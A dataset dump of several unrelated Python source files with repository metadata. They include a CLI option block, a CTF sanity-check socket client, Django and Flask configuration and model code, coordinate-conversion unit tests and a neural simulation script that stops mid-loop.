help="Configuration file ('~/.config/artcd.toml' by default)")
@click.option("--working-dir", "-C", metavar='PATH', default=None,
help="Existing directory in which file operations should be performed (current directory by default)")
@click.option("--dry-run", is_flag=True,
help="don't actually execute the pipeline; just print what would be done")
@click.option("--verbosity", "-v", count=True,
help="[MULTIPLE] increase output verbosity")
@click.pass_context
def cli(ctx: click.Context, config: Optional[str], working_dir: Optional[str], dry_run: bool, verbosity: int):
config_filename = config or Path("~/.config/artcd.toml").expanduser()
working_dir = working_dir or Path.cwd()
# configure logging
if not verbosity:
logging.basicConfig(level=logging.WARNING)
elif verbosity == 1:
logging.basicConfig(level=logging.INFO)
elif verbosity >= 2:
logging.basicConfig(level=logging.DEBUG)
else:
raise ValueError(f"Invalid verbosity {verbosity}")
ctx.obj = Runtime.from_config_file(config_filename, working_dir=Path(working_dir), dry_run=dry_run)
|
[
"yuxzhu@redhat.com"
] |
yuxzhu@redhat.com
|
433aa413dbbf3fa57c5763bd7eb0530e55be08f0
|
830465731dfda87b4141546262f20d74c29297bf
|
/Games/DagwCTF2020/TakeItBackNow/client0.py
|
3e577c3492467502cc615738464b2bae91453420
|
[] |
no_license
|
jchen8tw-research/CTF
|
f559d7ca0e16a730335b11caeeae208c42e8bf17
|
f49615c24437a9cc6a2c20d6b30cb5abf7a32b71
|
refs/heads/master
| 2023-03-17T12:29:08.630613
| 2021-03-23T06:31:26
| 2021-03-23T06:31:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
# -*- coding: utf-8 -*-
"""
Created for Spring 2020 CTF
Cryptography 0
10 Points
Welcome to my sanity check. You'll find this to be fairly easy.
The oracle is found at umbccd.io:13370, and your methods are:
flg - returns the flag
tst - returns the message after the : in "tst:..."
@author: pleoxconfusa
"""
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('crypto.ctf.umbccd.io', 13370)
sock.connect(server_address)
#available methods: flg, tst.
msg = 'tst:hello'
sock.sendall(msg.encode())
data = sock.recv(1024)
print(data.decode())
sock.close()
|
[
"cpr1014@gmail.com"
] |
cpr1014@gmail.com
|
b542e098a92e72342cb38640aacc06125c27de7f
|
998610ed0b370c5beb73d908164d07f6f9a692ab
|
/tachovendo_proj/settings/base.py
|
2eeb26e276275d69531b6b692436f73ad4a6f279
|
[] |
no_license
|
loogica/tachovendo_backend
|
d372f0032cc5ab02883c433cc2ed36467adf85c9
|
4333a55716df31897eeecb84ffa019456336e010
|
refs/heads/master
| 2016-09-06T08:06:07.003269
| 2013-06-04T01:03:36
| 2013-06-04T01:03:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,111
|
py
|
# coding: utf-8
"""Common settings and globals."""
import os
from os.path import abspath, basename, dirname, join, normpath
from sys import argv, path
from unipath import Path
########## PATH CONFIGURATION
# Absolute filesystem path to the Django project directory:
DJANGO_ROOT = dirname(dirname(abspath(__file__)))
PROJECT_ROOT = Path(__file__).ancestor(3)
# Absolute filesystem path to the top-level project folder:
SITE_ROOT = dirname(DJANGO_ROOT)
# Site name:
SITE_NAME = basename(DJANGO_ROOT)
# Add our project to our pythonpath, this way we don't need to type our project
# name in our dotted import paths:
path.append(DJANGO_ROOT)
########## END PATH CONFIGURATION
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('you', 'your@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
########## END DATABASE CONFIGURATION
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Sao_Paulo'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
gettext = lambda s: s
LANGUAGES = (
('pt', gettext('Português')),
('en', gettext('English')),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
LOCALE_PATHS = normpath(join(DJANGO_ROOT, 'locale'))
########## END GENERAL CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = normpath(join(DJANGO_ROOT, 'media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = normpath(join(DJANGO_ROOT, 'assets'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
normpath(join(DJANGO_ROOT, 'static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = r"$&jkf@shv+tec-uz_t5qz0u7nxrp%2b4v!9ym3rqd!=mmy-7+*"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
normpath(join(SITE_ROOT, 'fixtures')),
)
########## END FIXTURE CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
normpath(join(DJANGO_ROOT, 'templates')),
)
########## END TEMPLATE CONFIGURATION
########## MIDDLEWARE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#middleware-classes
MIDDLEWARE_CLASSES = (
# Default Django middleware.
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## URL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = '%s.urls' % SITE_NAME
########## END URL CONFIGURATION
# Auth views Config
LOGIN_URL = "/login"
LOGIN_REDIRECT_URL = "/"
# End
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
# Database migration helpers:
'south',
'widget_tweaks',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'tachovendo',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
########## END APP CONFIGURATION
########## RIOAPPS KEY CONFIG
APP_ID = os.environ.get('RIOAPPS_APP_ID')
APP_SECRET = os.environ.get('RIOAPPS_APP_SECRET')
########## END RIOAPPS KEYS CONFIG
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'events.views': {
'handlers': ['console'],
'level': 'INFO',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## WSGI CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'wsgi.application'
########## END WSGI CONFIGURATION
|
[
"felipecruz@loogica.net"
] |
felipecruz@loogica.net
|
2b17d640e22b95cc5a61021381c03af14f83aee7
|
a30362e51cb3291daf26d0c62e56c42caeec837f
|
/python/acmicpc/unsolved/8984.py
|
e9fc6b9f6e862ee51d73a36e02a12d6bc484c6b5
|
[] |
no_license
|
TERADA-DANTE/algorithm
|
03bf52764c6fcdb93d7c8a0ed7a672834f488412
|
20bdfa1a5a6b9c378e588b17073e77a0126f7339
|
refs/heads/master
| 2023-04-14T21:40:11.250022
| 2023-04-12T13:00:37
| 2023-04-12T13:00:37
| 288,335,057
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 210
|
py
|
import sys
input = sys.stdin.readline
n, l = list(map(int, input().split()))
lines = [list(map(int, input().split())) for _ in range(n)]
def solution(n, l, lines):
return n, l, lines
print(n, l, lines)
|
[
"55175301+TERADA-DANTE@users.noreply.github.com"
] |
55175301+TERADA-DANTE@users.noreply.github.com
|
3f14475e0c2863c12b7447c7a82f14ad759b824e
|
a140fe192fd643ce556fa34bf2f84ddbdb97f091
|
/.history/class맴버변수_20200708170750.py
|
62351d8c9312e58d87ab4c22a5685c88c76c9c41
|
[] |
no_license
|
sangha0719/py-practice
|
826f13cb422ef43992a69f822b9f04c2cb6d4815
|
6d71ce64bf91cc3bccee81378577d84ba9d9c121
|
refs/heads/master
| 2023-03-13T04:40:55.883279
| 2021-02-25T12:02:04
| 2021-02-25T12:02:04
| 342,230,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
class Unit:
def __init__(self, name, hp, damage):
self.name = name
self.hp = hp
self.damage = damage
print("{0} 유닛이 생성 되었습니다.".format(self.name))
print("체력 {0}, 공격력 {1}".format(self.hp, self.damage))
# 레이스 : 공중 유닛, 비행기, 클로킹 (상대방에게 보이지 않음)
wraith = Unit
|
[
"sangha0719@gmail.com"
] |
sangha0719@gmail.com
|
76c6674b3a2fb4f35bd3276d78443a663070b14f
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2950/60632/269982.py
|
e99e3be7a8277b32c3e022c23301da28661ec71a
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 273
|
py
|
s = list(input())
if len(s) % 2 == 1:
print(-1)
else:
result = 0
for i in range(len(s)):
if s[:i].count('5') > s[:i].count('2'):
result = -1
break
result = max(s[:1].count('2')-s[:1].count('5'), result)
print(result)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
54a8883bb18ba783ca7d90de1608b104223d1c3f
|
30dbb8c5a5cce9dfea904924f00a1451abd0c88b
|
/이분탐색/입국심사.py
|
d1b435138bd0d7498ccb48efc79bedafab3961ee
|
[] |
no_license
|
gksrb2656/AlgoPractice
|
7eac983509de4c5f047a880902253e477f4ca27c
|
5285479625429b8ef46888c8611dc132924833b7
|
refs/heads/master
| 2020-12-22T17:20:33.677147
| 2020-09-22T16:05:53
| 2020-09-22T16:05:53
| 236,872,750
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
def solution(n, times):
l = 1
r = max(times)*n
answer = 0
while l <= r:
mid = (l + r) // 2
flag = 0
people = 0
for t in times:
people += mid // t
if people >= n:
flag = 1
answer = mid
break
if flag:
r = mid - 1
else:
l = mid + 1
return answer
solution(6, [7, 10])
|
[
"rbcjswkd@gmail.com"
] |
rbcjswkd@gmail.com
|
149a39da8051edd413bd0e53d557532e042ebf01
|
fc6f0806292263bbfb2055587468df68ab6a950e
|
/tests/test_mixins.py
|
dad5938477e9c873a7c71c6b6f343aff1a6fd7b9
|
[
"Apache-2.0"
] |
permissive
|
WithPrecedent/sourdough
|
8c0a5cff14c2257162fd1d66bf03a5a53f6a9571
|
e42f81e5b27b067e13ff17338300e56c23ae4cad
|
refs/heads/master
| 2023-03-03T16:23:10.857530
| 2021-02-10T04:49:57
| 2021-02-10T04:49:57
| 261,512,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,898
|
py
|
"""
test_mixins: unit tests for Component mixins
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
"""
import dataclasses
import sourdough
@dataclasses.dataclass
class AComponent(
sourdough.Bunch,
sourdough.Registry,
sourdough.quirks.Element):
pass
@dataclasses.dataclass
class OtherComponent(AComponent):
pass
@dataclasses.dataclass
class AnotherComponent(sourdough.Options, OtherComponent):
options = sourdough.Catalog(contents = {
'base': AComponent(),
'other': OtherComponent()})
@dataclasses.dataclass
class ProxiedComponent(sourdough.Proxy, OtherComponent):
def __post_init__(self):
super().__post_init__()
self._hidden_attribute = 'value'
self.proxify(proxy = 'new_property', attribute = '_hidden_attribute')
def test_mixins():
# Tests Component, Registry, and Bunch
a_component = AComponent()
other_component = OtherComponent()
assert 'other_component' in AComponent.store
assert 'other_component' in a_component.store
assert 'other_component' in AComponent.store
assert 'other_component' in a_component.store
an_instance = a_component.instance(key = 'other_component', name = 'test')
assert an_instance.name == 'test'
another_instance = a_component.borrow(key = 'other_component')
assert another_instance.name == 'other_component'
# Tests Options
another_component = AnotherComponent()
base_instance = another_component.select(key = 'base')
other_instance = another_component.select(key = 'other')
assert other_instance.name == 'other_component'
# Tests Proxy
# proxied_component = ProxiedComponent()
# assert proxied_component.new_property == 'value'
return
if __name__ == '__main__':
test_mixins()
|
[
"coreyrayburnyung@gmail.com"
] |
coreyrayburnyung@gmail.com
|
20878697ebaf854f56e4a45f312b2032fba93a2c
|
ef8c5c55b6ec3971adff9afe2db1f76556b87082
|
/code_examples/PyKIM/util/convert_coord/test_cart_cs.py
|
73f53cd89f0df756db61dc64bfb03fbd2688b823
|
[] |
no_license
|
wbkifun/my_stuff
|
7007efc94b678234097abf0df9babfbd79dcf0ff
|
0b5ad5d4d103fd05989b514bca0d5114691f8ff7
|
refs/heads/master
| 2020-12-10T22:40:28.532993
| 2017-11-15T11:39:41
| 2017-11-15T11:39:41
| 5,178,225
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,608
|
py
|
import numpy as np
from numpy import pi, sin, cos, tan, sqrt
from numpy.random import rand, randint
from numpy.testing import assert_equal as equal
from numpy.testing import assert_array_equal as a_equal
from numpy.testing import assert_array_almost_equal as aa_equal
from nose.tools import raises, ok_
import sys
from os.path import abspath, dirname
current_dpath = dirname(abspath(__file__))
sys.path.append(current_dpath)
def test_xyp2xyz():
'''
xyp2xyz(): center of panel, at panel border
'''
from cart_cs import xyp2xyz
R = 1
a = R/sqrt(3)
#------------------------------------------------
# center of panel
#------------------------------------------------
x, y, panel = 0, 0, 1
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (1,0,0))
x, y, panel = 0, 0, 2
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,1,0))
x, y, panel = 0, 0, 3
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-1,0,0))
x, y, panel = 0, 0, 4
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,-1,0))
x, y, panel = 0, 0, 5
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,0,-1))
x, y, panel = 0, 0, 6
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,0,1))
#------------------------------------------------
# at the panel border
#------------------------------------------------
alpha = pi/4
x, y, panel = a*tan(alpha), 0, 1
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (R*cos(alpha), R*sin(alpha), 0))
x, y, panel = a*tan(alpha), 0, 2
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-R*sin(alpha), R*cos(alpha), 0))
x, y, panel = 0, -a*tan(alpha), 2
(X, Y, Z) = xyp2xyz(x, y, panel)
aa_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)), 15)
x, y, panel = a*tan(alpha), 0, 3
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-R*cos(alpha), -R*sin(alpha), 0))
x, y, panel = a*tan(alpha), 0, 4
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (R*sin(alpha), -R*cos(alpha), 0))
x, y, panel = a*tan(alpha), 0, 5
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)))
x, y, panel = a*tan(alpha), 0, 6
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0, R*sin(alpha), R*cos(alpha)))
def test_xyz2xyp():
'''
xyz2xyp(): center of panel, at panel border
'''
from cart_cs import xyz2xyp
R = 1
a = R/sqrt(3)
#------------------------------------------------
# center of panel
#------------------------------------------------
xyp_dict = xyz2xyp(1, 0, 0)
a_equal(xyp_dict, {1:(0.0,0)})
xyp_dict = xyz2xyp(0, 1, 0)
a_equal(xyp_dict, {2:(0,0)})
xyp_dict = xyz2xyp(-1, 0, 0)
a_equal(xyp_dict, {3:(0,0)})
xyp_dict = xyz2xyp(0, -1, 0)
a_equal(xyp_dict, {4:(0,0)})
xyp_dict = xyz2xyp(0, 0, -1)
a_equal(xyp_dict, {5:(0,0)})
xyp_dict = xyz2xyp(0, 0, 1)
a_equal(xyp_dict, {6:(0,0)})
#------------------------------------------------
# at the panel border
#------------------------------------------------
alpha = pi/4
at = a*tan(alpha)
xyp_dict = xyz2xyp(R*cos(alpha), R*sin(alpha), 0)
a_equal(list(xyp_dict.keys()), [1,2])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(-R*sin(alpha), R*cos(alpha), 0)
a_equal(list(xyp_dict.keys()), [2,3])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(-R*cos(alpha), -R*sin(alpha), 0)
a_equal(list(xyp_dict.keys()), [3,4])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(R*sin(alpha), -R*cos(alpha), 0)
a_equal(list(xyp_dict.keys()), [1,4])
aa_equal(list(xyp_dict.values()), [(-at,0), (at,0)], 15)
xyp_dict = xyz2xyp(0, R*sin(alpha), -R*cos(alpha))
a_equal(list(xyp_dict.keys()), [2,5])
aa_equal(list(xyp_dict.values()), [(0,-at), (at,0)], 15)
xyp_dict = xyz2xyp(0, R*sin(alpha), R*cos(alpha))
a_equal(list(xyp_dict.keys()), [2,6])
aa_equal(list(xyp_dict.values()), [(0,at), (at,0)], 15)
def test_xyp2xyz_xyz2xyp():
'''
xyp2xyz() -> xyz2xyp() : check consistency, repeat 1000 times
'''
from cart_cs import xyp2xyz, xyz2xyp
N = 1000
R = 1
a = R/sqrt(3)
for i in range(N):
panel = randint(1,7)
alpha, beta = (pi/2)*rand(2) - pi/4
x, y = a*tan(alpha), a*tan(beta)
(X, Y, Z) = xyp2xyz(x, y, panel)
xyp_dict = xyz2xyp(X,Y,Z)
aa_equal((x,y), xyp_dict[panel], 15)
|
[
"kh.kim@kiaps.org"
] |
kh.kim@kiaps.org
|
7ba4723843b10f4bdde50acfefd5f04d1227d875
|
4344f7d6b3c26e8cb9c666ca0a1dc81d5d484fca
|
/4-auth/bookshelf/model_cloudsql.py
|
5ceac779fc83be92f4bf47d5d8bd2c1317916370
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
dpebot/getting-started-python
|
5beec5a68738ae47ed4bb642a7f4a119052ee6b6
|
07ce28b40c9be8555cb8575b83d7ba836b6483f2
|
refs/heads/master
| 2020-12-26T04:38:09.399296
| 2016-08-03T18:16:30
| 2016-08-03T18:16:30
| 65,573,255
| 4
| 3
| null | 2016-08-12T17:59:13
| 2016-08-12T17:59:13
| null |
UTF-8
|
Python
| false
| false
| 3,043
|
py
|
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
builtin_list = list
db = SQLAlchemy()
def init_app(app):
db.init_app(app)
def from_sql(row):
"""Translates a SQLAlchemy model instance into a dictionary"""
data = row.__dict__.copy()
data['id'] = row.id
data.pop('_sa_instance_state')
return data
class Book(db.Model):
__tablename__ = 'books'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
author = db.Column(db.String(255))
publishedDate = db.Column(db.String(255))
imageUrl = db.Column(db.String(255))
description = db.Column(db.String(255))
createdBy = db.Column(db.String(255))
createdById = db.Column(db.String(255))
def __repr__(self):
return "<Book(title='%s', author=%s)" % (self.title, self.author)
def list(limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
query = (Book.query
.order_by(Book.title)
.limit(limit)
.offset(cursor))
books = builtin_list(map(from_sql, query.all()))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
# [START list_by_user]
def list_by_user(user_id, limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
query = (Book.query
.filter_by(createdById=user_id)
.order_by(Book.title)
.limit(limit)
.offset(cursor))
books = builtin_list(map(from_sql, query.all()))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
# [END list_by_user]
def read(id):
result = Book.query.get(id)
if not result:
return None
return from_sql(result)
def create(data):
book = Book(**data)
db.session.add(book)
db.session.commit()
return from_sql(book)
def update(data, id):
book = Book.query.get(id)
for k, v in data.items():
setattr(book, k, v)
db.session.commit()
return from_sql(book)
def delete(id):
Book.query.filter_by(id=id).delete()
db.session.commit()
def _create_database():
"""
If this script is run directly, create all the tables necessary to run the
application.
"""
app = Flask(__name__)
app.config.from_pyfile('../config.py')
init_app(app)
with app.app_context():
db.create_all()
print("All tables created")
if __name__ == '__main__':
_create_database()
|
[
"jon.wayne.parrott@gmail.com"
] |
jon.wayne.parrott@gmail.com
|
4bf42f64d15e50c0c51bbc1ad46db6a070cd95e2
|
d5d2ddfb2f6a4d025d0d323d343550d11990674f
|
/model/scripts/main_mutual_information_MSN.py
|
d3113bb158c04dbcb81800724706ff0a482a1844
|
[] |
no_license
|
mickelindahl/dynsyn
|
5d710fa67d31f344c56c3b853b9d78af1f297fbf
|
c05a74c0f7dd977742ce55220d12270c03147e0f
|
refs/heads/master
| 2021-01-01T05:37:57.452690
| 2015-02-23T10:16:44
| 2015-02-23T10:16:44
| 30,537,438
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,161
|
py
|
import numpy
import pylab
import os
import sys
import time as ttime
# Get directory where model and code resides
model_dir= '/'.join(os.getcwd().split('/')[0:-1])
code_dir= '/'.join(os.getcwd().split('/')[0:-2])
# Add model, code and current directories to python path
sys.path.append(os.getcwd())
sys.path.append(model_dir)
sys.path.append(code_dir+'/nest_toolbox')
from simulation_utils import simulate_MSN
from src import misc
OUTPUT_PATH = os.getcwd()+'/output/' + sys.argv[0].split('/')[-1].split('.')[0]
RUN=True
# 48 minuter 200x10x10
HZS=numpy.linspace(5,50,10)
N_MSNS=numpy.linspace(5,50,10)
t=ttime.time()
save_result_at=OUTPUT_PATH+'/main_mutual_information_raw_data.pkl'
if RUN is False:
count_dic={}
for i_syn, syn in enumerate(['MSN_SNR_gaba_s_min', 'MSN_SNR_gaba_s_mid', 'MSN_SNR_gaba_s_max',
'MSN_SNR_gaba_p1']):
count_dic[i_syn]={}
for hz in numpy.linspace(5,50,10):
count_dic[i_syn][hz]={}
for N_MSN in numpy.linspace(5,50,10):
count_dic[i_syn][hz][N_MSN]=[]
for i in range(200):
c, time= simulate_MSN(int(N_MSN), ['SNR_izh'], [syn],
sim_time=1000, burst_onset=700, burst_offset=1000,
burst_rate=hz, threads=1)
count_dic[i_syn][hz][N_MSN].extend(c)
count_dic[i_syn][hz][N_MSN]=numpy.array(count_dic[i_syn][hz][N_MSN])
misc.pickle_save([count_dic, time],save_result_at)
else:
#count_dic, time= misc.pickle_load(save_result_at)
pass
save_result_at=OUTPUT_PATH+'/main_mutual_information_prob.pkl'
if RUN is False:
c_prob=[]
c_sum=[]
for i in sorted(list(count_dic.keys())):
c_prob.append([])
c_sum.append([])
for j, hz in enumerate(sorted(list(count_dic[i].keys()))):
c_prob[i].append([])
c_sum[i].append([])
for N in sorted(list(count_dic[i][hz].keys())):
c=count_dic[i][hz][N][2::3,:] # Pick out results for SNr
c_conv=misc.convolve(c,bin_extent=100, kernel_type='rectangle')
c_prob[i][j].append(numpy.sum(c_conv<1,axis=0)/float(c_conv.shape[0]))
c_sum[i][j].append(numpy.sum(c,axis=0))
c_prob=numpy.array(c_prob)
c_sum=numpy.array(c_sum)
misc.pickle_save([c_prob, c_sum, time],save_result_at)
else:
c_prob, c_sum, time= misc.pickle_load(save_result_at)
from numpy import *
import pylab as p
#import matplotlib.axes3d as p3
import mpl_toolkits.mplot3d.axes3d as p3
from matplotlib import cm
#ax2=pylab.subplot(111)
for i in range(c_sum.shape[0]):
#
x=[]
y=[]
z=[]
#fig = pylab.figure()
#ax1=pylab.subplot(111)
for j in range(c_sum.shape[1]):
x.append([])
y.append([])
z.append([])
for k in range(c_sum.shape[2]):
x[j].append(HZS[j])
y[j].append(N_MSNS[k])
z[j].append(c_sum[i,j,k,770])
#z[j].append(c_prob[i,j,k,770])
if (i==1) and (j==1) and (k==9):
fig = pylab.figure()
ax=pylab.subplot(111)
ax.plot(time, c_sum[i,j,k,:])
ax.plot(time, misc.convolve(c_sum[i,j,k,:], bin_extent=100, kernel_type='rectangle', single=True).transpose())
pylab.show()
ax.set_xlabel('Spike count')
#ax1.plot(c_sum[i,j,k,:])
#ax1.plot(c_prob[i,j,k,:])
x=numpy.array(x)
y=numpy.array(y)
z=numpy.array(z)
# fig = pylab.figure()
# ax = p3.Axes3D(fig)
# ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet)
# ax.view_init(50, 135)
#
fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[1]):
ax.plot(x[:,k],z[:,k])
ax.set_xlabel('Firing rate (spikes/s)')
fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[2]):
ax.plot(y[k,:],z[k,:])
ax.set_xlabel('Number of MSNs')
#ax1.pcolor(numpy.array(z))
#pylab.colorbar()
pylab.show()
count=numpy.array(count_dic[1][5][5])
save_result_at=OUTPUT_PATH+'/main_mutual_information_convolved_raw_data.pkl'
if RUN is True:
count_conv=[]
count_conv=misc.convolve(count, bin_extent=10, kernel_type='rectangle')
misc.pickle_save([count_conv],save_result_at)
else:
count_conv= misc.pickle_load(save_result_at)
count=count_conv
save_result_at=OUTPUT_PATH+'/main_mutual_information_count_sr.pkl'
if RUN is True:
data=[]
min_data=[]
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3,:]))
min_data.append(numpy.floor(numpy.min(count[i::3,:])))
max_data.append(numpy.ceil(numpy.max(count[i::3,:])))
#data[1]=data[0]+data[1]
count_rs_list=[]
print max_data
for k in range(len(time)):
